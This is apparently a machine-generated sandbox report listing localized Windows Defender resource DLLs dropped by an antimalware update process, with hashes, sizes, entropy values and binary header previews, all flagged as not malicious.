SHA-256:	8FEB606A96406D9D577FED85746CABFC2BD732E4E69FA6E672FAAEE368C33901
SHA-512:	87A7D15D993E4FB00DF47D44C56F08E113CFB64888896BEA921FA40A61A50DD029B2E6A33020AB2202CD9CFD392CFCF7827592024813E28DE0A5487D27858B31
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L...fKVa...........!.........N...............................................p............@.......................................... ...K...........P... ...........................................................................................rdata..p...........................@..@.rsrc....K... ...L..................@..@............fKVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$..XF...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\hu-HU\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	66792
Entropy (8bit):	4.324275448179057
Encrypted:	false
SSDEEP:	1536:v/5upgBSeciRCGCgqbSvbCzQyak6JGbTPIeon/vYnkrFqueLgEcjieW1/QQQluQ4:v/ygBtciRCGCgqbSvbCzQyak6JGvPIe1
MD5:	DF44AE65B816A9BD69F1DC16406FB958
SHA1:	2D5C28205283C6B7ECBC49CE510D3B6E3200FE2D
SHA-256:	BE965A8FEA6A87CE70D33EB4273CB729E93BC968E3DDC054C2B05BE1E1B980ED
SHA-512:	B729CC7E865934747E9F1745210831761F59A5674FB0B880426DD971DBBC0AD6CADFF23914A208B0450D2E01BB9F205641FA8C04B3B98478654E42E01260CA6C
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!................................................................JB....@.......................................... ................... ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\hu-HU\MpEvMsg.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	55528
Entropy (8bit):	4.5122942075790204
Encrypted:	false
SSDEEP:	1536:RAfDrIaqK9yZqryQgncnxBthBBPWZFgbrf6AEfBF25MugzJUIul0i/JHPKeZ:RAfDrIaqK9yZqryQgncnxBthBBPWZFg1
MD5:	19B9FC01053994043BA62B9184DA6744
SHA1:	947330371F0211F8ED97B2439D2D869D402CD413
SHA-256:	D88AE56F4016ED3CEC159A725474199CCB6775B4DA012F2CAAFFA6BA34D2BA3B
SHA-512:	D3ECC14B1A8161D1F8FD953A2CF504DAD7ECAA5B80D057938525F0ACC5CB801FB82714DF2B07DA9066B3B556FE0C20F20DFEC29FC48763B1E83BDC943A282C73
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!......................................................................@.......................................... .................. ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@............]..........T...8...8.......]..........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... ..8....rsrc$02.... ..._<.....5..\Z2........~..4]..........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\hu-HU\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	29928
Entropy (8bit):	5.076935686951398
Encrypted:	false
SSDEEP:	768:7rJ+Z8VLAWFm5H1ctjfJ0z4Sp80Vm7kctvvwdWtjB8KR1PSGM:0Z8Um7k1KHPSN
MD5:	0840EB14DB0A5B63509B244A7C09EBC1
SHA1:	3C6550AAB19112E0226831D7B96DB1F2251CBDB2
SHA-256:	528EED32F6FE145DCABD4E5EDD619F2736F2AE9721DF9699EBC96DDA61793C03
SHA-512:	D38E9E6BBF2E0B477FFCD3C3CF5035ABAE5686012FF423BBAABEE7E8732C7D17F1913972273AAC1D34AD72BECE091F8D948CDD5B16D4CD8BB234C95F0BE30F52
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L...hKVa...........!.........R...............................................p......].....@.......................................... ..$O...........T... ...........................................................................................rdata..p...........................@..@.rsrc...$O... ...P..................@..@............hKVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$..pJ...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\id-ID\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	63208
Entropy (8bit):	4.17871211961196
Encrypted:	false
SSDEEP:	384:7rrqCt4+luBxQRliqd9bvgcSmnHYJVcUzNJe8sCLqcTmBWfivhKl/s7kKl2aqAWQ:7rhIoscUX0Qqvwl2p5R1PCXm
MD5:	130873D2E19F8E4FECB3406E5B203E8B
SHA1:	4F4FE85E218281C2D01377FAE6C7E7BC6B7CD0BD
SHA-256:	AD811C6D80C3BA2DF1D574F23DAC24A42DAB1C8DBD142CACA7DDE6293FBA1DAD
SHA-512:	ECCD6020BBF83560EDDBFBC9BDA0CA2B52F41CD131E5FB2C35677E875E4C2F194CDA9F591833882140B75723915D8D6D951D1FA3B72994F77803899FA08CBF2B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!................................................................B.....@.......................................... ................... ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\id-ID\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	29432
Entropy (8bit):	4.99389443194205
Encrypted:	false
SSDEEP:	384:7rR+Jftb8WemFAjCW0SZgWS8/WXYRDBRJULhl95SfKI:7rI5aNR1PULzMh
MD5:	8EFD7C5E912ACA7F0DFA73B4E49835A2
SHA1:	A6603D76F920A9B2361D58959819999D69BC6242
SHA-256:	4ECB23CFC70FBFE8395D36A3F952C635AEA5E0C066AE7BEE0DA3E467D7B52BE0
SHA-512:	19C0994B3A36BD5DD29CF7B51868BDE1144CDD9C58BC3EC8C3EA96488FBA7A769847CEB082D75E83B0D1977516B9F4D080EB42E0CBAD857CB13F5A55017FCE41
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L...jKVa...........!.........P...............................................p............@.......................................... ...L...........R... ...........................................................................................rdata..p...........................@..@.rsrc....L... ...N..................@..@............jKVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...H...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\is-IS\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	27880
Entropy (8bit):	5.168791856068094
Encrypted:	false
SSDEEP:	768:7rL68FdEF38Id8ZdB+8QBn5CBSdQ3dQ0kJpPvKT/VTdLYkUoR1PIO:G8FdEF38Id8zB+8QBn5CB+QtQ0kJpPvY
MD5:	E588A8FAABD5714585A6327BDE8A5620
SHA1:	65FF60FF56A4D7DC835E33DA56572C832E277CFA
SHA-256:	354ABCEDCAC302A6739CE0B34F2D370B64DEDB8446A7A8DCD9EBF83BFBCE8B46
SHA-512:	ED6EB2C9A1CE5B6C513F01CC627E1F64C8BD71DFC7DBCE24F7BCD898214B238A8F77D07BB3537A06673CF49B100718CE3C0935A35CF57C7357806E5E9430A126
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L...mKVa...........!.........J...............................................p......o.....@.......................................... ..<F...........L... ...........................................................................................rdata..p...........................@..@.rsrc...<F... ...H..................@..@............mKVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...A...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\it-IT\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	67304
Entropy (8bit):	4.132717552996604
Encrypted:	false
SSDEEP:	768:7rE/dO5unVXqYTzA/GzKXPayGcFiGTkbjYYGf415W9R1PZ6Ln:JCp8/JXpZinNW9HPUj
MD5:	999B7D50B0D5054A248145C57DE8FE53
SHA1:	4AA7F6DF0C72D7B027C1B65B6A02EE6647B52465
SHA-256:	16A49CDEE6DD11357E6857C2889B32F66E5E2B76C349BBA38F202D0CA2439866
SHA-512:	1E9F2D3AED6FE3D64E7FBA0D284A850525A39FAD03CA59B5AB9F071DB117903FD8F1305EB6BBD05D55E89D45B30196B9DF28FE94294069B3C81AC8391A09E210
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!......................................................................@.......................................... ................... ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\it-IT\MpEvMsg.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	57080
Entropy (8bit):	4.350435469770897
Encrypted:	false
SSDEEP:	384:7rWCfOuV52WS/ZbMTWm0M6I58icRb2gGEo2AXJTT5dhZmt5rrqS/hWMdRDBRJBVs:7rJV52WSNcTmt5rrZ/5dR1P8
MD5:	9621E72BDE052AF87248869D95F740F1
SHA1:	887595EEC280DCDB054614F266F41C75DEFC4D57
SHA-256:	24DEDBBE081A2D26F80A28F889341BC9CB6B69F7AAB007690F1D401E10C03455
SHA-512:	CE10E12FA3C67A49A4654D9770B238C13B989E35BD5B904D03CFE3EF258B7D8A4C90A1CFE5330414DA0121AC1366B47593C09E13CA27143101424794C9830626
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!................................................................B2....@.......................................... ..t................ ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@............]..........T...8...8.......]..........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... ..8....rsrc$02.... ..._<.....5..\Z2........~..4]..........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\it-IT\ProtectionManagement.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	53992
Entropy (8bit):	5.492779102890903
Encrypted:	false
SSDEEP:	768:7r5KTCD18dcc+/LwHzlqryYLP3WEHVGFmzyJ6tx1xR1Py5u/:xKU89BoOCfWSSzkx1xHPMu/
MD5:	AC686BE337F5CEA8D06B615FD6C4B9F7
SHA1:	2D47FE3019D2F2A17C76648B0E7F7D161438FF71
SHA-256:	69F72D00445DCE6A4A9A2BD69627451C875BF864BF98F7AC554FB0E3737903A6
SHA-512:	9B0A90233C3B8B1F5742C4E1FC16833F70CBD5C1A90D4A873CCD7167F1B6B93B25C4B264FE712BC6090CF8662FB2533E6A2F77D77BE815748F812F95DA14FFEE
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!................................................................b.....@.......................................... ................... ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@............l...........T...8...8.......l...........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....%..H....rsrc$02.... ...=..E.......'G.:3..t.E....R<l...........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\it-IT\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	29416
Entropy (8bit):	4.9712953301970595
Encrypted:	false
SSDEEP:	384:7rqX8bLJnJTVMVahjelKZ/b5O25FivDpWS8/WCRDBRJCwH24rlGsQhV1:7rpqKZj5O25FpXR1PT6Ln
MD5:	F81A22F6704F1980685E1B6B968B1416
SHA1:	1B2601D9ADBC1EA2BD0BCBA9B80EE3BE9EA9651F
SHA-256:	7BE6AA910FF4FD157FC6B9E52B7F7AE412ABD8312195E4CA3AE30DD30BBC7230
SHA-512:	CD84C7D5731B00C4DB0857E30D7D81C2A4A779DBB53C3840998B72B37482FF5CB7B73D9F9AA12E5A7A9DFE033C90C9E3D004E0370D1B327B1B18F2D6978A4238
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L...oKVa...........!.........P...............................................p...........@.......................................... ...L...........R... ...........................................................................................rdata..p...........................@..@.rsrc....L... ...N..................@..@............oKVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...G...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\ja-JP\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	40696
Entropy (8bit):	5.952689426161434
Encrypted:	false
SSDEEP:	768:7r076wGkwuPLiN42gGEU7ZCCC22oyQtR1PK5o:7erlbqCCC/oZtHP7
MD5:	A84F9DD91E651D6378ED25EE410ABD73
SHA1:	1FBCCFD07EE6A3FA2110C0B9992D218BDD59EC7D
SHA-256:	DAA5A39F5A41E8549354878BCA60D247B097D0726C642043BCCC8EA5E9958834
SHA-512:	C4D19F074A92D152F50578EE09F895E190D2D7B56C4608FE519A174107B86A68EE017E2AA86FF27637347031B729DA2C6EA7A6DA5F7215F6BFC7B83EA026F1AC
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!.........\|......................................................+.....@.......................................... ..8x...........~... ..............8............................................................................rdata..............................@..@.rsrc........ ...z..................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\ja-JP\MpEvMsg.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	40184
Entropy (8bit):	5.692908056305945
Encrypted:	false
SSDEEP:	384:7r8zD9jSxBFlzKjB4GWflEOlhFrT+59FbWEUBWDRDBRJrxl59j:7rkJjwzKjB4GiEOlfrT+VxUkR1PP
MD5:	0B72C73DD7E9D396164D44860FEC4603
SHA1:	EFFE6260B5A04791CCF416A58611A57D2D3338B0
SHA-256:	6E489D30EF3956D7C55DE98EB4A292D67534AC168821338DBB71387DCED9BB51
SHA-512:	3C1CE71E2AAC2ACBA464B1B3215C50BFA586DEB5D43EDCAEEB8B49E627C250EADE5F39370D51A29786011CC35A40D51A9DD6C3ACC033CE9C850427E42C644AF0
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!.........z.......................................................o....@.......................................... ...v...........\|... ..............8............................................................................rdata..............................@..@.rsrc........ ...x..................@..@............]..........T...8...8.......]..........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... ..8....rsrc$02.... ..._<.....5..\Z2........~..4]..........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\ja-JP\ProtectionManagement.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	49896
Entropy (8bit):	4.963755288153568
Encrypted:	false
SSDEEP:	768:7rVYKptfU1QkzUGe+AXWUmpbYE+XSQCNehkcR1PFry5u:OKjfQehXTlX80kcHPFrqu
MD5:	C56197002C189E3EC7ABEAC4CFF3E183
SHA1:	79C73E0A54084E9ADCE759797F6DEA5E9A955220
SHA-256:	D13177865A421AB8CCB13B22BC5C880DC5852F24444F2F2B3E9942CB6CB002E7
SHA-512:	F7A76819A8040F54EAEECCA22F170043244393461BB0C4E878620A4CCADF4BB4DA94FBDC24B2BB25ABAF51DAD4FBF16ED9108A6CF7C5F90C6A1D033BB921DD73
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!................................................................$.....@.......................................... ..<................ ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@............l...........T...8...8.......l...........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....%..H....rsrc$02.... ...=..E.......'G.:3..t.E....R<l...........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\ja-JP\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20712
Entropy (8bit):	6.305306395769163
Encrypted:	false
SSDEEP:	384:7r6FKnW/CT4FUQHCudWPnWAePnXWS8/WBRDBRJAjVslGsJr:7riCT4FUQHqWAegUR1P20
MD5:	12B946F8340850633DC2DD6EE40F2A42
SHA1:	7EF96849746EC5FBB8C9FC88442349615260B889
SHA-256:	ADB66E12F137843707DAE15EF8514215C3965D4F67FC4F6D378E2E9A2EA52995
SHA-512:	12AD21BC98A6716323D818F86623F37EE1F9F92B8896D829BDE88F205FFE2AD822A0BEC924436AD556B783A5F1E426A0B026C54B0A6A66224AB1EFE64035F790
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L...pKVa...........!.........................................................P......J.....@.......................................... ...+...........0... ...........................................................................................rdata..p...........................@..@.rsrc....+... ...,..................@..@............pKVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...&...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\ka-GE\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	29432
Entropy (8bit):	5.535742733053287
Encrypted:	false
SSDEEP:	384:7rXAyiwSeZZhyV9JDTWS8/WJRDBRJiIrltk:7rQyeU0R1P+
MD5:	5EA27B137DFF448CE6BD2879F3C66E91
SHA1:	A11050E90CE6231B67986D6138929D95F1B8C6AE
SHA-256:	6EA4760836B21829EF37A42DD11D279755634397B45610F995072FF3C7372F79
SHA-512:	9864904006AF860B992C35705139DE47C299698D8ED8588A99AB785B84956836943EF78354ED5457EF3A678E1DDE87E12933CEBE170704CFED0E254FAEEFB6CF
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L...pKVa...........!.........P...............................................p............@.......................................... ...L...........R... ...........................................................................................rdata..p...........................@..@.rsrc....L... ...N..................@..@............pKVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...G...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\kk-KZ\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	29432
Entropy (8bit):	5.429214986508693
Encrypted:	false
SSDEEP:	384:7rpvSe28JA8D6lOaGAFjLl8OWS8/W/RDBRJeihl95V:7rp6DPl+CR1PtzV
MD5:	CBB0D632BD86C20FAC9B608931890A2D
SHA1:	E08F55FD0EF694F7236BD09F5D24D3FB05CDD093
SHA-256:	F4D674AE9B124693687AA9181F8AB96A993A7439486481F5FFE9859B10FF3947
SHA-512:	168D01012B3460C88EF3AD1D437D6F4ED8434DB17A277B92012AE2F336F7957AAC4105DC63FF71C9C042B8C810D9F2E0B79667107DECD8E5678A082587800D1E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L...qKVa...........!.........P...............................................p......f ....@.......................................... ...M...........R... ...........................................................................................rdata..p...........................@..@.rsrc....M... ...N..................@..@............qKVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...H...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\km-KH\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	28920
Entropy (8bit):	5.7484502932065755
Encrypted:	false
SSDEEP:	384:7rSu0zkKcYfI3m3ukDgDq3ppYdhJcY55IWS8/WaRDBRJahl95LX:7r53YmS3XYdhJcY57DR1PazLX
MD5:	D7C1156285AC257A9461248BCB1FDCB7
SHA1:	45F948D951DDA79008960F1D8F37C2AF16B397A6
SHA-256:	C9CD72ED2E024BF5A3651350DEA394F3DA16B1A6A674130E175B6AA248C53C3F
SHA-512:	0971F9061432629427F72FA92381A37D121826D2DDA7E002B8C6293FE9211CDBAFB0D8FEC8B22822E490A97FE980FC0A77199BFB868C818D5128B9DD15E5F2F9
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L...sKVa...........!.........N...............................................p......n[....@.......................................... ...J...........P... ...........................................................................................rdata..p...........................@..@.rsrc....J... ...L..................@..@............sKVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...F...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\kn-IN\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	29944
Entropy (8bit):	5.602742123554825
Encrypted:	false
SSDEEP:	384:7rNCgxAiN2Dg1YcKP+0r0Rk2JwpXpghWS8/WHRDBRJIdhl95bh:7r6iN2Dg1YbPKwpX+6uR1Puz9
MD5:	172B8401C1C0B9248548370B531E9BD2
SHA1:	C6758C5CF245A01B75683177416A6C2DD3786964
SHA-256:	8714403277C0B396A6A8854BA936CCFABA5841143E04C2735D67AD3B81516767
SHA-512:	F78EFC0C850E53891652E804D7C0C85D10EB6CB6344ED9476B9C33D5593B64936FD442DCB433E8FFF48F8216260AFBC4006D61DC984C605FCCC4AC2528E2F97F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L...sKVa...........!.........R...............................................p............@.......................................... ..<N...........T... ...........................................................................................rdata..p...........................@..@.rsrc...<N... ...P..................@..@............sKVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$...I...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\ko-KR\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	40168
Entropy (8bit):	6.183056330278341
Encrypted:	false
SSDEEP:	384:7rhaHQFQDBFgM5WC1GFXCCma5mxFygFLkTgzgKxqmBmowmSvBnDJJvh+WeQWrRDE:7rYDlcQIrnvZ+5R1PKGW
MD5:	1D1D0208330A5E6FD3019FFEEBC2FFAA
SHA1:	E63AF73481CAB673A8744408CDD4BCBAAEF71280
SHA-256:	3464105CF6B8FD9FF7366A52350217341C53BD20B0B9BA8C833502FF81A244F2
SHA-512:	41B45D8CF4D56EFA55171F60D8D9DB6E9BF76A7A111B3AEE368754C353140773F9C09A4CAC92D12B25A8487659680C93E4D907ADB2C80F2FD88101E7F33A24A5
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!.........z............................................................@.......................................... ..xv...........\|... ..............8............................................................................rdata..............................@..@.rsrc........ ...x..................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\ko-KR\MpEvMsg.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	37624
Entropy (8bit):	5.829106279830697
Encrypted:	false
SSDEEP:	384:7rkefGvVMa9p9nxxdtk6Bozu/BQQ1sTrTCKFoqnqLIZLN1VpByHTZ7XNtgZnuuCd:7rZ+v1UHzpq8F0zZTNyZ1CDQzR1PW
MD5:	EA80DE1104EA53A2893D83B1FF47612D
SHA1:	BBE517A5A68BB1A525C9D9ED24588B83464F35CD
SHA-256:	B61E5C561E1902D170E87D61112E93D4038B6F6A8F3C8B11C063EDCA3E37368B
SHA-512:	FBED7E27ABCF453464002151EC7AA9D8181306FE13BFAF8100F3E1A6E424D3ED6AE270F0DE9FDA28F50F7FA2C0F4407362EDFA6C0D4018FD0B90ECFEBD961072
Malicious:	false
